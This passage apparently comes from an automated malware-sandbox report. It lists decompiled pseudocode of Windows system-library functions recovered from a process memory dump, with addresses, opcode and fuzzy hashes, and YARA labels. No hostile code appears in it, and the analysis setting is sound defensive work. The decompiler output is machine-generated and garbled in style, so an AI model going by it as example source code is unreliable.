				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                          0x033da61c
                                          0x033da61e
                                          0x033da623
                                          0x033da628
                                          0x033da62b
                                          0x033da62d
                                          0x033da648
                                          0x033da64a
                                          0x033da64f
                                          0x03419b44
                                          0x033da6ec
                                          0x033da6f1
                                          0x033da6f1
                                          0x033da655
                                          0x033da657
                                          0x033da65a
                                          0x033da65d
                                          0x033da662
                                          0x033da663
                                          0x033da667
                                          0x033da668
                                          0x033da66d
                                          0x033da706
                                          0x033da706
                                          0x03419bda
                                          0x03419be6
                                          0x03419beb
                                          0x00000000
                                          0x03419beb
                                          0x033da679
                                          0x03419b7a
                                          0x00000000
                                          0x03419b7a
                                          0x033da683
                                          0x033da6f4
                                          0x033da6f7
                                          0x033da6f9
                                          0x033da6fd
                                          0x033da6a0
                                          0x033da6a0
                                          0x033da6ad
                                          0x033da6af
                                          0x033da6b4
                                          0x03419ba7
                                          0x03419bac
                                          0x00000000
                                          0x00000000
                                          0x03419bc6
                                          0x03419bce
                                          0x03419bd1
                                          0x03419bd3
                                          0x03419bd3
                                          0x00000000
                                          0x03419bd1
                                          0x033da6bd
                                          0x033da6c3
                                          0x033da6c6
                                          0x033da6d2
                                          0x033da701
                                          0x033da704
                                          0x00000000
                                          0x033da704
                                          0x033da6d4
                                          0x033da6d6
                                          0x033da6d9
                                          0x033da6db
                                          0x033da6e1
                                          0x033da6e6
                                          0x033da6e8
                                          0x033da6e8
                                          0x033da6ea
                                          0x00000000
                                          0x033da6ea
                                          0x033da688
                                          0x033da692
                                          0x033da694
                                          0x033da699
                                          0x00000000
                                          0x00000000
                                          0x033da69d
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52aaeba09d8fcc9adad3ab4657f2e0ff20cae03e0892ac486e5dbf81762fa6cb
                                          • Instruction ID: c59d32f1fcc121f673d69d71d2c4b31fbfe2c746fc778a2b3d10458fe945a1b2
                                          • Opcode Fuzzy Hash: 52aaeba09d8fcc9adad3ab4657f2e0ff20cae03e0892ac486e5dbf81762fa6cb
                                          • Instruction Fuzzy Hash: 78416AB6A11205DFCB15CF68D990B9ABBF1FB49304F1980AAE814AF344C774A911CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E3D43, Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E033E3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E033B7B60(0, _t61, 0x33811c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E033B7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L033C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                          0x033e3d4c
                                          0x033e3d50
                                          0x033e3d55
                                          0x033e3d5e
                                          0x0341e79a
                                          0x00000000
                                          0x0341e79a
                                          0x033e3d68
                                          0x0341e789
                                          0x033e3d9d
                                          0x033e3da3
                                          0x033e3daf
                                          0x033e3db5
                                          0x033e3dbc
                                          0x033e3dc4
                                          0x033e3dc9
                                          0x033e3dce
                                          0x0341e7ae
                                          0x0341e7ae
                                          0x033e3dde
                                          0x033e3de2
                                          0x033e3de7
                                          0x033e3e0d
                                          0x033e3e13
                                          0x033e3e16
                                          0x033e3e1e
                                          0x033e3e25
                                          0x033e3e28
                                          0x00000000
                                          0x00000000
                                          0x033e3e2a
                                          0x033e3e2f
                                          0x033e3e37
                                          0x033e3e37
                                          0x00000000
                                          0x033e3e37
                                          0x033e3e31
                                          0x00000000
                                          0x033e3e31
                                          0x033e3e20
                                          0x033e3e20
                                          0x033e3e35
                                          0x00000000
                                          0x033e3de9
                                          0x033e3de9
                                          0x033e3de9
                                          0x033e3dee
                                          0x033e3dfd
                                          0x033e3dff
                                          0x033e3e02
                                          0x033e3e05
                                          0x033e3e05
                                          0x00000000
                                          0x033e3df0
                                          0x033e3de7
                                          0x0341e78f
                                          0x0341e794
                                          0x033e3d79
                                          0x033e3d84
                                          0x033e3d89
                                          0x033e3d8e
                                          0x00000000
                                          0x0341e7a4
                                          0x033e3d96
                                          0x033e3d9a
                                          0x00000000
                                          0x033e3d9a
                                          0x00000000
                                          0x0341e794
                                          0x033e3d6e
                                          0x033e3d73
                                          0x00000000
                                          0x0341e7b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5fb66bd5e6852ac9e79fdb12361ddd55b8ead4c88e83b8e3b42d351994b3c265
                                          • Instruction ID: f7f82180348764d4f755c73c42efd2cad350598f2285c2ea2640d447359b4f84
                                          • Opcode Fuzzy Hash: 5fb66bd5e6852ac9e79fdb12361ddd55b8ead4c88e83b8e3b42d351994b3c265
                                          • Instruction Fuzzy Hash: 9631C63AA05624DBD725CF69C8C1A7BB7F9EF85720B09806EE855DB7A0E730D840C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033CC182, Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E033CC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E033C7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03478D34(_v8, _t80);
					}
					E033C2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E033BFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03478833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E033BFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E033EB180();
						if(_a4 != 0) {
							E033C2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E033CBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E033CBB2D(_t16, _t15);
						E033CB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E033BFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E033BFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E033BFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                          0x033cc18d
                                          0x033cc18f
                                          0x033cc191
                                          0x033cc19b
                                          0x033cc1a0
                                          0x033cc1d4
                                          0x033cc1de
                                          0x03412d6e
                                          0x033cc1e4
                                          0x033cc1e4
                                          0x033cc1e4
                                          0x033cc1ec
                                          0x03412d7d
                                          0x03412d7d
                                          0x033cc1f3
                                          0x033cc1ff
                                          0x03412d88
                                          0x03412d8d
                                          0x03412d94
                                          0x03412d94
                                          0x03412d9f
                                          0x03412da4
                                          0x03412dab
                                          0x03412db0
                                          0x03412db2
                                          0x03412db3
                                          0x03412db4
                                          0x03412dbc
                                          0x03412dc3
                                          0x03412dc3
                                          0x033cc205
                                          0x033cc205
                                          0x033cc208
                                          0x033cc20e
                                          0x033cc211
                                          0x033cc216
                                          0x033cc219
                                          0x033cc21f
                                          0x033cc222
                                          0x033cc22c
                                          0x033cc234
                                          0x033cc23a
                                          0x033cc23f
                                          0x033cc245
                                          0x033cc24b
                                          0x033cc251
                                          0x033cc25a
                                          0x033cc276
                                          0x033cc27d
                                          0x033cc27d
                                          0x033cc25c
                                          0x033cc25c
                                          0x00000000
                                          0x033cc25e
                                          0x033cc1a4
                                          0x033cc1aa
                                          0x033cc1b3
                                          0x033cc265
                                          0x033cc26c
                                          0x033cc26c
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction ID: bc50b823201f8e20800c18dd2b711e55d82cb57c810bedb4661856d7f65bfe0c
                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction Fuzzy Hash: 09310876A01686AEDB04EBB5C8D0BEAF768BF42204F08515ED41C8F201DB346E56CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03427016, Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E03427016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x349d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03426B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03426B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E033C7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E033E9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E033EB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L033C4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                          0x03427016
                                          0x0342701e
                                          0x0342702b
                                          0x03427033
                                          0x03427037
                                          0x0342703c
                                          0x0342703e
                                          0x03427041
                                          0x03427045
                                          0x0342704a
                                          0x03427050
                                          0x03427055
                                          0x0342705a
                                          0x03427062
                                          0x03427062
                                          0x0342705a
                                          0x03427064
                                          0x03427064
                                          0x03427067
                                          0x03427071
                                          0x03427096
                                          0x0342709b
                                          0x034270a2
                                          0x034270a6
                                          0x034270a7
                                          0x034270ad
                                          0x034270b3
                                          0x034270b6
                                          0x034270bb
                                          0x034270c3
                                          0x034270c3
                                          0x034270c6
                                          0x034270cd
                                          0x034270dd
                                          0x034270e0
                                          0x034270e2
                                          0x034270e2
                                          0x034270ee
                                          0x03427101
                                          0x034270f0
                                          0x034270f9
                                          0x034270f9
                                          0x0342710a
                                          0x0342710e
                                          0x03427112
                                          0x03427117
                                          0x03427118
                                          0x03427118
                                          0x034270bb
                                          0x0342711d
                                          0x03427123
                                          0x03427131
                                          0x03427131
                                          0x03427136
                                          0x0342713d
                                          0x0342713e
                                          0x0342713f
                                          0x0342714a
                                          0x0342714a
                                          0x03427084
                                          0x03427088
                                          0x00000000
                                          0x0342708e
                                          0x0342708e
                                          0x03427092
                                          0x00000000
                                          0x03427092

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ae5a026f146779ed2be40f3d50677823f7ac24e2f39bbf9557ccbcb8fe6a391
                                          • Instruction ID: a891d72b321070a5e8d3382ef8a89cd683a0c7eea8c4bbb84a07a74282854ec2
                                          • Opcode Fuzzy Hash: 5ae5a026f146779ed2be40f3d50677823f7ac24e2f39bbf9557ccbcb8fe6a391
                                          • Instruction Fuzzy Hash: 8831CA766047619FC321DF28CD80A6BBBE5BF88700F44461EF9959B791E730E904C7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033DA70E, Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E033DA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3497b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3497b10 = 8;
					 *0x3497b14 = 0x3497b0c;
					 *0x3497b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E033DA990(0x3497b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L033DA840(__edx, __ecx, __ecx, _t52, 0x3497b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3497b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x3497b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x3497b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L033C4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3497b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E033EF3E0(_t50,  *0x3497b14, _t8 >> 3);
						_t28 =  *0x3497b14; // 0x0
						__eflags = _t28 - 0x3497b0c;
						if(_t28 != 0x3497b0c) {
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x3497b14 = _t50;
						_t48 = _v12;
						 *0x3497b10 = _t9;
						goto L6;
					}
					 *0x3497b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                          0x033da713
                                          0x033da714
                                          0x033da717
                                          0x033da71d
                                          0x033da720
                                          0x033da722
                                          0x033da727
                                          0x033da74a
                                          0x033da754
                                          0x033da75e
                                          0x033da768
                                          0x033da76a
                                          0x033da773
                                          0x033da78b
                                          0x033da790
                                          0x033da792
                                          0x033da741
                                          0x033da741
                                          0x033da743
                                          0x033da749
                                          0x033da749
                                          0x033da732
                                          0x033da73a
                                          0x033da797
                                          0x033da79d
                                          0x033da7a3
                                          0x033da7a9
                                          0x033da7b6
                                          0x033da7bc
                                          0x033da7ca
                                          0x033da7e0
                                          0x033da7e2
                                          0x033da7e4
                                          0x03419bf2
                                          0x00000000
                                          0x03419bf2
                                          0x033da7ed
                                          0x033da7f2
                                          0x033da800
                                          0x033da805
                                          0x033da80d
                                          0x033da812
                                          0x03419c08
                                          0x03419c08
                                          0x033da818
                                          0x033da81b
                                          0x033da821
                                          0x033da824
                                          0x00000000
                                          0x033da824
                                          0x033da7ae
                                          0x00000000
                                          0x033da7ae
                                          0x033da73c
                                          0x033da73e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5f849b26b198880b954f12d93c1c878133cc0cdbecad2152d6896a927fac0ab
                                          • Instruction ID: 4ea3b54282c819201964d60448c92312070b5f43ddaa3420dc8283d9ac04e44a
                                          • Opcode Fuzzy Hash: d5f849b26b198880b954f12d93c1c878133cc0cdbecad2152d6896a927fac0ab
                                          • Instruction Fuzzy Hash: 9731CDB2624204AFD711DF58E9C0F6ABFF9FB95758F18095BE015AF248D3B0A901CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033AAA16, Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E033AAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x349d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3497b9c; // 0x0
					_t53 = L033C4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E033EB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E033EF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L033B6C59(_t53, _t51, _t58) != 0) {
							_t28 = E033D5E50(0x338c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E033DB230(_v32, _v28, 0x338c2d8, 1,  &_v24);
								_t28 = E033AF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                          0x033aaa25
                                          0x033aaa29
                                          0x033aaa2d
                                          0x033aaa30
                                          0x033aaa37
                                          0x033aaa3c
                                          0x03404458
                                          0x03404458
                                          0x03404472
                                          0x03404474
                                          0x03404476
                                          0x033aaa64
                                          0x033aaa74
                                          0x0340447c
                                          0x03404483
                                          0x03404492
                                          0x033aaa52
                                          0x033aaa54
                                          0x033aaa5e
                                          0x034044a8
                                          0x034044ad
                                          0x034044af
                                          0x034044b6
                                          0x034044b6
                                          0x034044b9
                                          0x034044bc
                                          0x034044cd
                                          0x034044d3
                                          0x034044d6
                                          0x034044e1
                                          0x034044e1
                                          0x034044e6
                                          0x034044e8
                                          0x034044fb
                                          0x034044fb
                                          0x034044e8
                                          0x00000000
                                          0x033aaa5e
                                          0x03404476
                                          0x033aaa42
                                          0x033aaa46
                                          0x033aaa48
                                          0x033aaa4c
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 627414016b32c708386de6b6600bfb8286f8f652c2c4e9424358cbe3ab9bfb82
                                          • Instruction ID: 1da38f2375bf7d939cf49f21f32752cff34be2948d24bdb9ab5cbf9f036135c5
                                          • Opcode Fuzzy Hash: 627414016b32c708386de6b6600bfb8286f8f652c2c4e9424358cbe3ab9bfb82
                                          • Instruction Fuzzy Hash: D631C372A00619ABCF11EF69CDC1ABFB7B8EF44700B05406AF901EB290E7759D11CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D61A0, Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E033D61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E033D5E50(0x33867cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03479D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E033AF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                          0x033d61b3
                                          0x033d61b5
                                          0x033d61bd
                                          0x033d61c3
                                          0x033d61c7
                                          0x033d61d2
                                          0x033d61ff
                                          0x033d61ff
                                          0x033d6201
                                          0x033d6207
                                          0x033d6207
                                          0x033d61d4
                                          0x033d61d9
                                          0x00000000
                                          0x00000000
                                          0x033d61df
                                          0x033d61e2
                                          0x00000000
                                          0x00000000
                                          0x033d61e6
                                          0x033d61e8
                                          0x033d61ee
                                          0x033d61ee
                                          0x033d61f9
                                          0x0341762f
                                          0x03417632
                                          0x03417635
                                          0x03417639
                                          0x03417640
                                          0x0341766e
                                          0x03417675
                                          0x00000000
                                          0x00000000
                                          0x03417681
                                          0x03417689
                                          0x0341768d
                                          0x03417691
                                          0x03417695
                                          0x03417699
                                          0x034176af
                                          0x034176b5
                                          0x034176b7
                                          0x034176b7
                                          0x034176d7
                                          0x034176dc
                                          0x00000000
                                          0x034176dc
                                          0x034176a2
                                          0x034176a9
                                          0x03417651
                                          0x03417653
                                          0x03417653
                                          0x03417656
                                          0x03417656
                                          0x00000000
                                          0x03417656
                                          0x03417644
                                          0x03417646
                                          0x03417648
                                          0x03417648
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a6ee07620d4247c9e7a51210e18dffdb4492e80a30c2d8ca64c6e9698fbfd27
                                          • Instruction ID: 1f53bf535602fcca6d8380edc27db206da6cefddaf6fe094c1d11c65e9f635dd
                                          • Opcode Fuzzy Hash: 5a6ee07620d4247c9e7a51210e18dffdb4492e80a30c2d8ca64c6e9698fbfd27
                                          • Instruction Fuzzy Hash: 0531AE726157018FD320CF09D841B2AFBE8FB88B10F48496EF9A89B361D770D804CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E4A2C, Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E033E4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x349d360 ^ _t62;
				_v8 =  *0x349d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E033C2280(_t26, 0x3498608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E033BFFB0(_t41, _t51, 0x3498608);
						L2:
